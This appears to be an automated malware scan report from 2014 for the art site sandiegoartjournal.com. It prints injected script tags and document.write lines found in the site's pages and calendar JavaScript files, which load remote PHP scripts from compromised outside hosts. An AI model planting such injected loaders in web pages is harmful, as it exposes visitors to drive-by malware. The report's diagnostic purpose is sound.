Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sandiegoartjournal.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sandiegoartjournal.com/ | 200 OK Content-Length: 4328 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://designimraum.com/ru1e4Mbz.php?id=21562407"></script> | ||
http://sandiegoartjournal.com/auctions.html | 200 OK Content-Length: 5363 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://designimraum.com/ru1e4Mbz.php?id=21562403"></script> | ||
http://sandiegoartjournal.com/resources.html | 200 OK Content-Length: 7315 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://designimraum.com/ru1e4Mbz.php?id=21562412"></script> | ||
http://sandiegoartjournal.com/insight.html | 200 OK Content-Length: 3456 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://designimraum.com/ru1e4Mbz.php?id=21562409"></script> | ||
http://sandiegoartjournal.com/index.html | 200 OK Content-Length: 4328 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://designimraum.com/ru1e4Mbz.php?id=21562407"></script> | ||
http://sandiegoartjournal.com/event/form.html | 200 OK Content-Length: 9435 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://80.55.154.59//uploads/gklcjymg.php?id="></script> | ||
http://sandiegoartjournal.com/event/calendar/calendar.js | 200 OK Content-Length: 49556 Content-Type: text/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://80.55.154.59//uploads/gklcjymg.php?id="></script>'); | ||
http://sandiegoartjournal.com/event/calendar/calendar-en.js | 200 OK Content-Length: 3922 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Calendar._DN = new Array ("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"); Calendar._SDN = new Array ("Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"); Calendar._FD = 0; Calendar._MN = new Array ("January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "December", Calendar._TT["TODAY"] = "Today"; Calendar._TT["TIME_PART"] = "(Shift-)Click or drag to change value"; Calendar._TT["DEF_DATE_FORMAT"] = "%Y-%m-%d"; Calendar._TT["TT_DATE_FORMAT"] = "%a, %b %e"; Calendar._TT["WK"] = "wk"; Calendar._TT["TIME"] = "Time:"; document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://sandiegoartjournal.com/event/calendar/calendar-setup.js | 200 OK Content-Length: 9175 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Calendar.setup = function (params) { function param_default(pname, def) { if (typeof params[pname] == "undefined") { params[pname] = def; } }; param_default("inputField", null); param_default("displayArea", null); param_default("button", null); param_default("eventName", "click"); param_default("ifFormat", "%Y/%m/%d"); param_default("daFormat", "%Y/%m/%d"); param_default("singleClick", true); param_default("disableFu cal.create(); cal.refresh(); if (!params.position) cal.showAtElement(params.button || params.displayArea || params.inputField, params.align); else cal.showAt(params.position[0], params.position[1]); return false; }; return cal; }; document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://shinhanvn.com.vn/Uploads/iOVAO5QT.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://sandiegoartjournal.com/event/Scripts/AC_RunActiveContent.js | 404 Not Found Content-Length: 425 Content-Type: text/html | clean |
http://sandiegoartjournal.com/test404page.js | 404 Not Found Content-Length: 403 Content-Type: text/html | clean |
http://sandiegoartjournal.com/newsletter.html | 200 OK Content-Length: 3182 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://designimraum.com/ru1e4Mbz.php?id=21562411"></script> | ||
http://app.icontact.com/icp/loadsignup.php/form.js?c=777043&l=6720&f=594 | 200 OK Content-Length: 2920 Content-Type: text/javascript | malicious |
Malicious code found. Script contains blacklisted domain: sandiegoartjournal.com ...[152 bytes skipped]... .link,\n .link a {\n text-decoration: none;\n }\n .signupframe {\n border: 1px solid #000000;\n background: #ffffff;\n }\n.signupframe .required {\n font-size: 10px;\n }\n<\/style>\n<form method=\"post\" action=\"http://app.icontact.com/icp/signup.php\" name=\"icpsignup\" id=\"icpsignup594\" accept-charset=\"UTF-8\" onsubmit=\"return verifyRequired594();\" >\n<input type=\"hidden\" name=\"redirect\" value=\"http://sandiegoartjournal.com\">\n<input type=\"hidden\" name=\"errorredirect\" value=\"http://www.icontact.com/www/signup/error.html\">\n\n<div id=\"SignUp\">\n<table width=\"260\" class=\"signupframe\" border=\"0\" cellspacing=\"0\" cellpadding=\"5\">\n <tr>\n <td valign=\"top\" align=\"right\">\n <span class=\"required\">*<\/span> Email\n <\/td>\n <td align=\"left\">\n <input type=\"text\" name=\"fields_ema ...[2239 bytes skipped]... Decoded script: ...[189 bytes skipped]... { text-decoration: none; } .signupframe { border: 1px solid #000000; background: #ffffff; } .signupframe .required { font-size: 10px; } </style> <form method="post" action="http://app.icontact.com/icp/signup.php" name="icpsignup" id="icpsignup594" accept-charset="UTF-8" onsubmit="return verifyRequired594();" > <input type="hidden" name="redirect" value="http://sandiegoartjournal.com"> <input type="hidden" name="errorredirect" value="http://www.icontact.com/www/signup/error.html"> <div id="SignUp"> <table width="260" class="signupframe" border="0" cellspacing="0" cellpadding="5"> <tr> <td valign="top" align="right"> <span class="required">*</span> Email </td> <td align="left"> <input type="text" name="fields_email"> ...[2217 bytes skipped]... | ||
http://sandiegoartjournal.com/contact.html | 200 OK Content-Length: 4576 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://designimraum.com/ru1e4Mbz.php?id=21562405"></script> | ||
http://sandiegoartjournal.com/device.html | 200 OK Content-Length: 9836 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://designimraum.com/ru1e4Mbz.php?id=21562406"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sandiegoartjournal.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 30 Jun 2014 23:04:16 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 4328
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 00:04:15 GMT
...4328 bytes of data.
GET / HTTP/1.1
Host: sandiegoartjournal.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 30 Jun 2014 23:04:16 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 4328
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 00:04:15 GMT
...4328 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: sandiegoartjournal.com
Referer: http://www.google.com/search?q=sandiegoartjournal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sandiegoartjournal.com
Referer: http://www.google.com/search?q=sandiegoartjournal.com
Result:
The result is similar to the first query. There are no suspicious redirects found.